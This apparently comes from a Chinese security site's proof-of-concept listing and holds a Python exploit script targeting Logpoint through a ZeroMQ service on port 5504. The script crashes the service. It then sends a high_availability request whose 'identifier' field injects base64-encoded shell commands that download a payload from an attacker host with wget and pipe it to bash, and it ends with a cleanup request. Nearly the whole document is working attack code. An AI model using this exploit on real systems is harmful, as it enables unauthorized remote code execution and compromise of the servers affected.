当前位置:首页 > POC 2017年06月22日
Logpoint

import time
import zmq
import sys
import json
import random
import string
import base64
  
ATTACKER_IP = '172.16.171.1'
LOGPOINT_IP = '172.16.171.204'
  
def crash():
    context = zmq.Context()
    sock = context.socket(zmq.DEALER)
    sock.connect("tcp://%s:5504"%LOGPOINT_IP)
    sock.send('crash')
  
crash()
time.sleep(1)
  
context = zmq.Context()
  
sock2 = context.socket(zmq.DEALER)
sock2.connect("tcp://%s:5504"%LOGPOINT_IP)
  
name = ''.join(random.choice(string.ascii_uppercase) for _ in range(6))
  
cmd1 = base64.b64encode('wget http://%s:8000/e -O /tmp/e'%ATTACKER_IP)
cmd2 = base64.b64encode('cat /tmp/e')
  
exploit = '%s"; $(echo -n %s | base64 -d) && $(echo -n %s | base64 -d) | bash ; echo "test'%(name, cmd1, cmd2)
  
tosend = json.dumps({"request_id": name, "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "add", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
print tosend
sock2.send(tosend)
print sock2.recv()
  
time.sleep(30)
  
# cleaning
tosend = json.dumps({"request_id": name+"-1", "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "delete", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
print tosend
sock2.send(tosend)
print sock2.recv()



发表评论: